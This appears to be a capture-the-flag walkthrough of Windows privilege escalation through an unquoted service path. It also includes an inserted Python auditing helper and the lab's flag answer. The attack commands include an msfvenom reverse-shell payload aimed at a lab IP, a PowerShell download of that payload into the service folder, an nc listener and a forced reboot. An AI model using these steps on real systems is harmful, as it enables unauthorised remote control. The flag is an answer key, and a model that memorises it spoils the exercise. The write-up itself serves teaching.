Grammar is important. Don't believe me? Just see what happens when you forget punctuation.
use Remmina to log into the machine
open cmd and start enumerating
systeminfo
net user
Check whoami /priv. This can reveal some very easy ways to escalate, but we're unlucky this time:
list all auto-start services outside C:\Windows whose binary path is not quoted (very useful for spotting abnormal ones)
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Get some more information about the service
sc qc "Development Service"
This path is definitely unquoted. The Start Type is AUTO_START, so this one deserves a closer look
Upon boot (because of Start Type: AUTO_START) this service searches for the exe in this order:
- C:\Program.exe
- C:\Program Files\Development.exe
- C:\Program Files\Development Files\Devservice.exe
- C:\Program Files\Development Files\Devservice Files\Service.exe
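The lookup order above can be reproduced for any service path, which is handy when auditing a box for this weakness. This is an added example, not code from the original write-up; the service list it checks is constructed sample data modelled on the wmic output above.

```python
from typing import List, Tuple

# Added example: model the CreateProcess lookup order for an unquoted
# service ImagePath, so an auditor can list which paths Windows would try.

def candidate_paths(pathname: str) -> List[str]:
    """Return the executables Windows would try, in order, for a service path.

    A path wrapped in double quotes is used as-is (one candidate). For an
    unquoted path, every space is a possible end of the executable name:
    Windows tries the text before the space (with .exe appended) first,
    then moves to the next space, and only reaches the full path last.
    """
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return [pathname[1:end] if end != -1 else pathname[1:]]
    candidates = []
    idx = 0
    while True:
        idx = pathname.find(" ", idx)
        if idx == -1:
            break
        prefix = pathname[:idx]
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
        idx += 1
    # Windows stops at the first candidate that exists; we cannot know that
    # offline, so the full (unquoted) string is reported as the final fallback.
    candidates.append(pathname)
    return candidates


def needs_quoting(pathname: str) -> bool:
    """True when the path is unquoted and contains a space (more than one candidate)."""
    return len(candidate_paths(pathname)) > 1


def find_unquoted_autostart(services: List[Tuple[str, str, str]]) -> List[str]:
    """Return names of auto-start services whose path should be quoted.

    services: (name, pathname, startmode) tuples, as wmic reports them.
    """
    return [name for name, path, mode in services
            if mode.lower() == "auto" and needs_quoting(path)]


# Constructed sample data (not real wmic output from the target machine).
SAMPLE_SERVICES = [
    ("DevService", r"C:\Program Files\Development Files\Devservice Files\Service.exe", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\good.exe"', "Auto"),
    ("NoSpaces", r"C:\Tools\agent.exe", "Auto"),
    ("ManualSvc", r"C:\Program Files\Manual Tool\tool.exe", "Manual"),
]
```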
Generate a payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.74 LPORT=4444 -f exe -o Devservice.exe
python3 -m http.server
cd C:\Program Files\Development Files
powershell
wget http://10.8.0.74:8000/Devservice.exe -OutFile Devservice.exe
dir
open listener
nc -vlnp 4444
restart the machine
shutdown /r /t 0
after the reboot, once the machine comes back up, you will get the shell
| Flag | flag.txt |
|---|---|
| Answer | THM{USPE_SUCCESS} |